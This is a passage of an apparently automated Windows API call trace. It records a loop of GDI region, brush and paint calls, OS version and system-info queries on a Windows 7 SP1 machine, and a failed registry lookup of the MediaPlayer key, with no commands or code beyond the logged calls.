[0091.030] CombineRgn (hrgnDst=0x1045a00, hrgnSrc1=0xb40401d9, hrgnSrc2=0xb20401dc, iMode=4) returned 2 [0091.030] CreateSolidBrush (color=0xff) returned 0x21059fe [0091.030] CreateSolidBrush (color=0xff0000) returned 0x1105a01 [0091.030] DeleteObject (ho=0x1105a01) returned 1 [0091.030] DeleteObject (ho=0xb20401dc) returned 1 [0091.030] DeleteObject (ho=0xb40401d9) returned 1 [0091.030] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.030] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.030] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.030] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.031] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.031] BeginPath (hdc=0x0) returned 0 [0091.031] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.031] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.031] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.031] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.031] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.031] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.031] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.031] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.031] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401dc [0091.031] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401d9 [0091.031] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a02 [0091.031] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a03 [0091.031] CombineRgn (hrgnDst=0x1045a02, hrgnSrc1=0xb30401dc, hrgnSrc2=0xb50401d9, iMode=1) returned 1 [0091.031] CombineRgn (hrgnDst=0x1045a03, hrgnSrc1=0xb30401dc, hrgnSrc2=0xb50401d9, iMode=4) returned 2 [0091.031] CreateSolidBrush (color=0xff) returned 0x2105a01 [0091.031] CreateSolidBrush (color=0xff0000) returned 0x1105a04 [0091.031] DeleteObject (ho=0x1105a04) returned 1 [0091.031] DeleteObject (ho=0xb50401d9) returned 1 [0091.031] DeleteObject (ho=0xb30401dc) returned 1 [0091.031] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.031] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.031] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.031] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.031] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.031] BeginPath (hdc=0x0) returned 0 [0091.032] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.032] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.032] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.032] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.032] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.032] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.032] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.032] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.032] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401d9 [0091.032] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401dc [0091.032] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a05 [0091.032] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a06 [0091.032] CombineRgn (hrgnDst=0x1045a05, hrgnSrc1=0xb60401d9, hrgnSrc2=0xb40401dc, iMode=1) returned 1 [0091.032] CombineRgn (hrgnDst=0x1045a06, hrgnSrc1=0xb60401d9, hrgnSrc2=0xb40401dc, iMode=4) returned 2 [0091.032] CreateSolidBrush (color=0xff) returned 0x2105a04 [0091.032] CreateSolidBrush (color=0xff0000) returned 0x1105a07 [0091.032] DeleteObject (ho=0x1105a07) returned 1 [0091.032] DeleteObject (ho=0xb40401dc) returned 1 [0091.032] DeleteObject (ho=0xb60401d9) returned 1 [0091.032] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.032] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.032] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.032] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.032] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.032] BeginPath (hdc=0x0) returned 0 [0091.032] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.032] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.032] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.032] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.032] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.033] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.033] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.033] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.033] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401dc [0091.033] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401d9 [0091.033] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a08 [0091.033] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a09 [0091.033] CombineRgn (hrgnDst=0x1045a08, hrgnSrc1=0xb50401dc, hrgnSrc2=0xb70401d9, iMode=1) returned 1 [0091.033] CombineRgn (hrgnDst=0x1045a09, hrgnSrc1=0xb50401dc, hrgnSrc2=0xb70401d9, iMode=4) returned 2 [0091.033] CreateSolidBrush (color=0xff) returned 0x2105a07 [0091.033] CreateSolidBrush (color=0xff0000) returned 0x1105a0a [0091.033] DeleteObject (ho=0x1105a0a) returned 1 [0091.033] DeleteObject (ho=0xb70401d9) returned 1 [0091.033] DeleteObject (ho=0xb50401dc) returned 1 [0091.033] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.033] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.033] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.033] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.033] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.033] BeginPath (hdc=0x0) returned 0 [0091.033] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.033] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.033] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.033] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.033] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.033] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.033] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.034] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.034] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401d9 [0091.034] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401dc [0091.034] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a0b [0091.034] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a0c [0091.034] CombineRgn (hrgnDst=0x1045a0b, hrgnSrc1=0xb80401d9, hrgnSrc2=0xb60401dc, iMode=1) returned 1 [0091.034] CombineRgn (hrgnDst=0x1045a0c, hrgnSrc1=0xb80401d9, hrgnSrc2=0xb60401dc, iMode=4) returned 2 [0091.034] CreateSolidBrush (color=0xff) returned 0x2105a0a [0091.034] CreateSolidBrush (color=0xff0000) returned 0x1105a0d [0091.034] DeleteObject (ho=0x1105a0d) returned 1 [0091.034] DeleteObject (ho=0xb60401dc) returned 1 [0091.034] DeleteObject (ho=0xb80401d9) returned 1 [0091.034] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.034] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.034] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.034] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.034] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.034] BeginPath (hdc=0x0) returned 0 [0091.034] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.034] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.034] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.034] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.034] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.034] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.034] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.034] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.035] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401dc [0091.035] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401d9 [0091.035] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a0e [0091.035] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a0f [0091.035] CombineRgn (hrgnDst=0x1045a0e, hrgnSrc1=0xb70401dc, hrgnSrc2=0xb90401d9, iMode=1) returned 1 [0091.035] CombineRgn (hrgnDst=0x1045a0f, hrgnSrc1=0xb70401dc, hrgnSrc2=0xb90401d9, iMode=4) returned 2 [0091.035] CreateSolidBrush (color=0xff) returned 0x2105a0d [0091.035] CreateSolidBrush (color=0xff0000) returned 0x1105a10 [0091.035] DeleteObject (ho=0x1105a10) returned 1 [0091.035] DeleteObject (ho=0xb90401d9) returned 1 [0091.035] DeleteObject (ho=0xb70401dc) returned 1 [0091.035] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.035] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.035] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.035] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.035] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.035] BeginPath (hdc=0x0) returned 0 [0091.035] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.035] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.035] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.035] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.035] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.035] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.035] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.035] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.035] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xba0401d9 [0091.036] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb80401dc [0091.036] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a11 [0091.036] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a12 [0091.036] CombineRgn (hrgnDst=0x1045a11, hrgnSrc1=0xba0401d9, hrgnSrc2=0xb80401dc, iMode=1) returned 1 [0091.036] CombineRgn (hrgnDst=0x1045a12, hrgnSrc1=0xba0401d9, hrgnSrc2=0xb80401dc, iMode=4) returned 2 [0091.036] CreateSolidBrush (color=0xff) returned 0x2105a10 [0091.036] CreateSolidBrush (color=0xff0000) returned 0x1105a13 [0091.036] DeleteObject (ho=0x1105a13) returned 1 [0091.036] DeleteObject (ho=0xb80401dc) returned 1 [0091.036] DeleteObject (ho=0xba0401d9) returned 1 [0091.036] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.036] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.036] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.036] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.036] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.036] BeginPath (hdc=0x0) returned 0 [0091.036] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.036] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.036] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.036] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.036] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.036] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.036] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.036] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.036] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb90401dc [0091.036] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbb0401d9 [0091.036] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a14 [0091.036] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a15 [0091.037] CombineRgn (hrgnDst=0x1045a14, hrgnSrc1=0xb90401dc, hrgnSrc2=0xbb0401d9, iMode=1) returned 1 [0091.037] CombineRgn (hrgnDst=0x1045a15, hrgnSrc1=0xb90401dc, hrgnSrc2=0xbb0401d9, iMode=4) returned 2 [0091.037] CreateSolidBrush (color=0xff) returned 0x2105a13 [0091.037] CreateSolidBrush (color=0xff0000) returned 0x1105a16 [0091.037] DeleteObject (ho=0x1105a16) returned 1 [0091.037] DeleteObject (ho=0xbb0401d9) returned 1 [0091.037] DeleteObject (ho=0xb90401dc) returned 1 [0091.037] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.037] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.037] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.037] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.037] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.037] BeginPath (hdc=0x0) returned 0 [0091.037] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.037] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.037] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.037] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.037] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.037] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.037] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.037] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.037] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbc0401d9 [0091.037] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba0401dc [0091.037] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a17 [0091.037] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a18 [0091.037] CombineRgn (hrgnDst=0x1045a17, hrgnSrc1=0xbc0401d9, hrgnSrc2=0xba0401dc, iMode=1) returned 1 [0091.037] CombineRgn (hrgnDst=0x1045a18, hrgnSrc1=0xbc0401d9, hrgnSrc2=0xba0401dc, iMode=4) returned 2 [0091.037] CreateSolidBrush (color=0xff) returned 0x2105a16 [0091.037] CreateSolidBrush (color=0xff0000) returned 0x1105a19 [0091.037] DeleteObject (ho=0x1105a19) returned 1 [0091.038] DeleteObject (ho=0xba0401dc) returned 1 [0091.038] DeleteObject (ho=0xbc0401d9) returned 1 [0091.038] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.038] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.038] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.038] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.038] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.038] BeginPath (hdc=0x0) returned 0 [0091.038] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.038] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.038] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.038] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.038] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.038] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.038] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.038] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.038] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb0401dc [0091.038] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbd0401d9 [0091.038] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a1a [0091.038] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045a1b [0091.038] CombineRgn (hrgnDst=0x1045a1a, hrgnSrc1=0xbb0401dc, hrgnSrc2=0xbd0401d9, iMode=1) returned 1 [0091.038] CombineRgn (hrgnDst=0x1045a1b, hrgnSrc1=0xbb0401dc, hrgnSrc2=0xbd0401d9, iMode=4) returned 2 [0091.038] CreateSolidBrush (color=0xff) returned 0x2105a19 [0091.038] CreateSolidBrush (color=0xff0000) returned 0x1105a1c [0091.038] DeleteObject (ho=0x1105a1c) returned 1 [0091.038] DeleteObject (ho=0xbd0401d9) returned 1 [0091.038] DeleteObject (ho=0xbb0401dc) returned 1 [0091.038] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.039] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, 